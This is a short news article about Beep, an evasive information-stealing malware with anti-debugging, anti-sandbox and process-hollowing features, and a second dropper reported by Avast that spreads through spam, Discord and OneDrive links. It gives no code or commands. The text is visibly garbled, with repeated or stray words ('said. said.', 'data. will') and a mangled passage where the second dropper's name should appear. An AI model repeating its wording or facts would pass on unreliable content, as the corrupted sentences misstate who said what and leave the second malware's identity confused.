Cybersecurity researchers have discovered a new piece of evasive malware called beep It is designed to fly under the radar and drop additional payloads on compromised hosts.
“The authors of this malware appeared to be trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” said Minerva Labs researcher Natalie Zargarov. said.
“One such technique involved using the Beep API function to slow down execution, hence the name of the malware.”
Beep consists of three components. The first component is a dropper that creates a new Windows Registry key and executes the Base64-encoded PowerShell script stored there.
The PowerShell script accesses the remote server to get the injectors. After ensuring that the injector has not been debugged or launched in a virtual machine, it extracts and launches the payload using a technique called process hollowing.
The payload is an information stealer capable of gathering and extracting system information and enumerating running processes. Other instructions that malware can receive from command and control (C2) servers include the ability to execute DLL and EXE files.
Many other features have yet to be implemented, suggesting that Beep is still in early development.
What sets the new malware apart is its focus on stealth, employing numerous evasion tactics to thwart analysis, evade sandboxes, and slow execution. .
“This malware is very dangerous because once it successfully enters a system, it can easily download and spread various additional malicious tools, including ransomware,” said Zargarov.
The findings come after antivirus vendor Avast revealed details of another strain of codenamed dropper. needle dropper It has been used to distribute various malware families since October 2022.
Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminals looking to distribute their own payloads.
“This malware attempts to hide itself by dropping many unused and invalid files and storing important data among several megabytes of unimportant data. will,” said the company.
